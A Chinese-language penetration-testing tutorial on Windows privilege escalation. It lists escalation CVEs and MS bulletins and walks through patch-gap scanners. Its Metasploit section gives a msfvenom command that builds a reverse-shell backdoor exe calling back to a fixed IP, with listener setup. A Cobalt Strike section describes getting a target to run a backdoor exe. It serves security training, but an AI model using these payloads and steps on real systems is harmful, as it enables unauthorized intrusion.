权限提升-WIN全平台&MSF自动化&CS插件化&EXP筛选&溢出漏洞

权限的影响

后台权限：

SQL注入,数据库备份泄露，默认或弱口令等获取帐号密码进入

常规WEB界面文章分类等操作，后台功能可操作类

网站权限：

后台提升至网站权限，RCE或文件操作类[命令执行]、反序列化等漏洞直达Shell

查看或修改程序源代码，可以进行网站或应用的配置文件读取（接口配置信息，数据库配置信息等），还能收集服务器操作系统相关的信息，为后续系统提权做准备。

数据库权限：

SQL注入,数据库备份泄露，默认或弱口令等进入或网站权限获取后转入

操作数据库的权限，数据库的增删改等，源码或配置文件泄漏，也可能是网站权限(webshell)进行的数据库配置文件读取获得。也可以作为提升系统权限手段。

接口权限：

SQL注入,数据库备份泄露，源码泄漏，培植不当等或网站权限获取后转入

后台或网站权限后的获取途径：后台（修改配置信息功能点），网站权限（查看的配置文件获取），系统中 API 暴露到互联网上会存在一定的安全风险，: 爬虫、恶意访问等等。

系统权限：

高危系统漏洞直达或网站权限提升转入、数据库权限提升转入，第三方转入等

操作自己电脑一样

域控权限：

高危系统漏洞直达或内网横向渗透转入，域控其他服务安全转入等

操作自己电脑一样

权限提升的意义

首先要理解权限

权限有等级的一个分化，常见的权限有读写修改完全控制

而当一个用户只要读的一个权限他想操作写入和修改是不可能实现的

这是一个权限的限制作用

那么当用户想有写入操作或者更高的权限的时候，这就要用到权限提升的一个技术了

那么权限提升他的意义就是：当前的权限无法满足需要的操作，通过权限提升的技术，提升当前的权限来实现想要的操作。

权限划分

Linux：

【输入id查看】

管理员UID为0：系统的管理员用户。

系统用户UID为1～999：Linux系统为了避免因某个服务程序出现漏洞而被黑客提权至整台服务器，默认服务程序会由独立的系统用户负责运行，进而有效控制被破坏范围。

普通用户UID从1000开始：是由管理员创建的用于日常工作的用户。

Windows：

用户及组：system administrator user guest等

2022年的主流提权漏洞

CVE-2021-33739 [Microsoft DWM 核心库特权提升漏洞]（Windows 10、20）

CVE-2021-1732 [Windows Win32k 提权漏洞] (Windows 10, 2019/20H2)

CVE-2020-0787【Windows后台智能传输服务提权漏洞】（Windows 7/8/10、2008/2012/2016/2019）

CVE-2020-0796 [Microsoft 服务器消息块 3.1.1 (SMBv3) 协议处理某些请求的方式中存在一个远程代码执行漏洞，即“Windows SMBv3 客户端/服务器远程代码执行漏洞”] (Windows 1903/1909 )

CVE-2019-1458 [当Win32k组件无法正确处理内存中的对象时，Windows中存在一个特权提升漏洞]（Windows 7/8/10/2008/2012/2016）

CVE-2019-0803 [Win32k 组件无法正确处理内存中的对象时，Windows 中存在提权漏洞] (Windows 7/8/10/2008/2012/2016/2019)

CVE-2018-8639 [Win32k 组件无法正确处理内存中的对象时，Windows 中存在提权漏洞] (Windows 7/8/10/2008/2012/2016)

CVE-2018-1038 [Windows 内核提权漏洞]（Windows 7 SP1/Windows Server 2008 R2 SP1）

CVE-2018-0743 [Windows Subsystem for Linux Elevation of Privilege Vulnerability]（Windows 10 版本 1703/Windows 10 版本 1709/Windows Server 版本 1709）

CVE-2018-8453 [Windows Win32k 组件中的提权漏洞] (>= windows 8.1)

CVE-2018-8440 [Windows ALPC 提权漏洞] (windows 7/8.1/10/2008/2012/2016)

MS17-017 　[KB4013081] [GDI 调色板对象本地权限提升]（Windows 7/8）

CVE-2017-8464 　[LNK远程执行代码漏洞]（Windows 10 / 8.1 / 7/2016/2010/2008）

CVE-2017-0213 　[Windows COM 提权漏洞] (windows 10/8.1/7/2016/2010/2008)

CVE-2018-0833 [SMBv3 空指针取消引用拒绝服务] (Windows 8.1/Server 2012 R2)

CVE-2018-8120 [Win32k 提权漏洞] (Windows 7 SP1/2008 SP2,2008 R2 SP1)

MS17-010 　[KB4013389] [Windows 内核模式驱动程序] (windows 7/2008/2003/XP)

MS16-135 　[KB3199135] [Windows 内核模式驱动程序] (2016)

MS16-111 　[KB3186973] [内核 API] (Windows 10 10586 (32/64)/8.1)

MS16-098 　[KB3178466] [内核驱动程序] (Win 8.1)

MS16-075 　[KB3164038] [热土豆] (2003/2008/7/8/2012)

MS16-034 　[KB3143145] [内核驱动程序] (2008/7/8/10/2012)

MS16-032 　[KB3143141] [辅助登录句柄] (2008/7/8/10/2012)

MS16-016 　[KB3136041] [WebDAV] (2008/Vista/7)

MS16-014 　[K3134228] [远程代码执行] (2008/Vista/7)

MS15-097 　[KB3089656] [远程代码执行] (win8.1/2012)

MS15-076 　[KB3067505] [RPC] (2003/2008/7/8/2012)

MS15-077 　[KB3077657] [ATM] (XP/Vista/Win7/Win8/2000/2003/2008/2012)

MS15-061 　[KB3057839] [内核驱动程序] (2003/2008/7/8/2012)

MS15-051 　[KB3057191] [Windows内核模式驱动程序]（2003/2008/7/8/2012）

MS15-015 　[KB3031432] [内核驱动程序] (Win7/8/8.1/2012/RT/2012 R2/2008 R2)

MS15-010 　[KB3036220] [内核驱动程序] (2003/2008/7/8)

MS15-001 　[KB3023266] [内核驱动程序] (2008/2012/7/8)

MS14-070 　[KB2989935] [内核驱动程序] (2003)

MS14-068 　[KB3011780] [域权限提升] (2003/2008/2012/7/8)

MS14-058 　[KB3000061] [Win32k.sys] (2003/2008/2012/7/8)

MS14-066 　[KB2992611] [Windows Schannel 允许远程代码执行] (VistaSP2/7 SP1/8/Windows 8.1/2003 SP2/2008 SP2/2008 R2 SP1/2012/2012 R2/Windows RT/Windows RT 8.1)

MS14-040 　[KB2975684] [AFD 驱动程序] (2003/2008/2012/7/8)

MS14-002 　[KB2914368] [NDProxy] (2003/XP)

MS13-053 　[KB2850851] [win32k.sys] (XP/Vista/2003/2008/win 7)

MS13-046 　[KB2840221] [dxgkrnl.sys] (Vista/2003/2008/2012/7)

MS13-005 　[KB2778930] [内核模式驱动程序] (2003/2008/2012/win7/8)

MS12-042 　[KB2972621] [服务总线] (2008/2012/win7)

MS12-020 　[KB2671387] [RDP] (2003/2008/7/XP)

MS11-080 　[KB2592799] [AFD.sys] (2003/XP)

MS11-062 　[KB2566454] [NDISTAPI] (2003/XP)

MS11-046 　[KB2503665] [AFD.sys] (2003/2008/7/XP)

MS11-011 　[KB2393802] [内核驱动程序] (2003/2008/7/XP/Vista)

MS10-092 　[KB2305420] [任务计划程序] (2008/7)

MS10-065 　[KB2267960] [FastCGI]（IIS 5.1、6.0、7.0 和 7.5）

MS10-059 　[KB982799] [ACL-Churraskito] (2008/7/Vista)

MS10-048 　[KB2160329] [win32k.sys] (XP SP2 & SP3/2003 SP2/Vista SP1 & SP2/2008 Gold & SP2 & R2/Win7)

MS10-015 　[KB977165] [KiTrap0D] (2003/2008/7/XP)

MS10-012 　[KB971468] [SMB 客户端 Trans2 堆栈溢出] (Windows 7/2008R2)

MS09-050 　[KB975517] [远程代码执行] (2008/Vista)

MS09-020 　[KB970483] [IIS 6.0]（IIS 5.1 和 6.0）

MS09-012 　[KB959454] [Chimichurri] (Vista/win7/2008/Vista)

MS08-068 　[KB957097] [远程代码执行] (2000/XP)

MS08-067 　[KB958644] [远程代码执行] (Windows 2000/XP/Server 2003/Vista/Server 2008)

MS08-066 　[KB956803] [AFD.sys] (Windows 2000/XP/Server 2003)

MS08-025 　[KB941693] [Win32.sys] (XP/2003/2008/Vista)

MS06-040 　[KB921883] [远程代码执行] (2003/xp/2000)

MS05-039 　[KB899588] [PnP 服务] (Win 9X/ME/NT/2000/XP/2003)

MS03-026 　[KB823980] [RPC接口中的缓冲区溢出]（/ NT / 2000 / XP / 2003）

系统补丁检测脚本

WindowsVulnScan-master

补丁检测呢主要是检测是否有漏打的提权补丁包

如果有漏打

我们就可以根据这个漏洞的补丁漏洞去提权当前的权限

https://github.com/chroblert/WindowsVulnScan

要用到是这个

KBCollect.ps1

怎么去检测补丁呢

我们用到了一台WIN10系统的电脑

随便创建了一个文件夹

并把KBCollect.ps1文件复制进去了

这个时候我们在文件路径输入cmd，打开当前目录cmd模式

正常输入是先

输入powershell

然后.\KBCollect.ps1

但是呢由于权限的问题

我们可能运行不了

这时候就要这样了

1、输入：get-ExecutionPolicy
（此时会得到输出：Restricted）
2、输入：Set-ExecutionPolicy -Scope CurrentUser
3、输入：RemoteSigned
4、验证是否解决问题，输入：get-ExecutionPolicy
（此时若是返回RemoteSigned，问题解决)

5、.\KBCollect.ps1

生成补丁检测包

这就是生成好的

然后我们再把这个生成的包

复制到我们攻击者的电脑上

并打开

这就是我们刚刚目标电脑上检测的补丁

这时候还没有完

我们还要在当前电脑上用这个脚本去运行这个包

当前目录打开cmd

这个py可以正常的调动

这时候呢我们就要什么刚刚的补丁包检测哪些提权漏洞的补丁没有打的

python cve-check.py -C -f KB.json

Vulmap-master

这个的话有linux的和Windows两个系统上的检测

https://github.com/vulmon/Vulmap

windows

用的话也是很简单的

把这个复制或者上传到目标电脑上

然后运行起来就可以了

如果运行也报错什么的

可以参考上面的

1、输入：get-ExecutionPolicy
（此时会得到输出：Restricted）
2、输入：Set-ExecutionPolicy -Scope CurrentUser
3、输入：RemoteSigned
4、验证是否解决问题，输入：get-ExecutionPolicy
（此时若是返回RemoteSigned，问题解决)

5、.\vulmap-windows.ps1

linux

复制或者上传到目标的系统上

示例

要列出所有基本选项和开关，请使用-h开关：
python vulmap-linux.py -h
python3 vulmap-linux.py -h

在默认模式下运行：
python vulmap-linux.py
python3 vulmap-linux.py

启用详细模式：
python vulmap-linux.py -v
python3 vulmap-linux.py -v

要下载所有发现的漏洞利用程序：
python vulmap-linux.py -a
python3 vulmap-linux.py -a

要下载特定漏洞利用程序：
python vulmap-linux.py -d <exploit_id>
python3 vulmap-linux.py -d <exploit_id>

e.g
python vulmap-linux.py -d EDB20
python3 vulmap-linux.py -d EDB8310

wesng-master

https://github.com/bitsadmin/wesng

首先要更新漏洞数据库

python3 wes.py --update

或者

wes.py --update

然后使用该工具需要用到 Windows 的内置systeminfo.exe工具获取本地系统的系统信息（即在cmd命令行执行systeminfo命令即可。）
我这里是在webshell权限下把 systeminfo的执行信息写到txt文本下。

systeminfo >systeminfo.txt

可以看到主机的一些基本信息，包含打过的补丁。

然后通过systeminfo信息文件进行检测缺少的补丁。

python3 wes.py systeminfo.txt

或者

python wes.py systeminfo.txt

可以用到一些参数选择，将输出信息进行归档到 csv 文件中。

python3 wes.py systeminfo.txt --output vulns.csv 
python3 wes.py systeminfo.txt -o vulns.csv

或者这样【两个操作命令都可以】

python wes.py systeminfo.txt --output vulns.csv
python wes.py systeminfo.txt -o vulns.csv

补丁检测平台

https://i.hacking8.com/tiquan

这个平台呢

需要提供电脑的补丁信息

就是刚刚生成的systeminfo.txt

点击查询

往下拉

就可以看见检测出来可能存在的提权漏洞

MSF【美少妇工具提权了检测】

首先msf必须有控制目标系统的权限

用木马exe或者其他后门获得权限

生成反弹后门

msfvenom -p windows/meterpreter/reverse_tcp LHOST=106.14.195.29 LPORT=3333 -f exe -o msf.exe

配置监听会话

use exploit/multi/handler

set payload windows/meterpreter/reverse_tcp

set lhost 0.0.0.0

set lport 3333

exploit

然后美少妇工具的这个提权漏洞上的检测有自动和半自动的一个区别

有两个的

在调用这两个模块的同时

先要保存当前权限的会话形式

把当前的metasploit shell转为后台执行

用的命令是

 background 

保存的序列号为1

那么下面就是用到半自动的一个模块上进行提权漏洞的扫描

半自动

调用模块是

半自动：根据漏洞编号找出系统中安装的补丁

use post/windows/gather/enum_patches

设置用的序列号为刚刚保存的一号

设置成功run的启动就可以了

全自动

调用模块是

use post/multi/recon/local_exploit_suggester

全自动：快速识别系统中可能被利用的漏洞

需要配置的地方有两处

一处是序列号的

另外一处是 showdescription 改为ture

那么他这边扫描就会出现一下可能存在的漏洞

那么这些都会有调用模块的一些具体路径

调用路径中的模块去尝试就可以了

CSGO提权

首先配置监听器

简单的配置一下

两个HTTP地址一样

那么现在生成一个exe后门

选择好监听器

选择好点击

生成

下面就是让目标上线了

首先就是把exe发给目标或者让目标运行这个exe

上线了

下面就对下面这台电脑的进行权限的查看

当前权限是普通用户的

下面就改一下会话隔连为0

下面提权用到一个巨龙传说的插件

巨龙传说Ladon

https://github.com/k8gege/Ladon

点击脚本管理器

加载

这边就多了一个K8Ladon

或者选择这个

中文版本的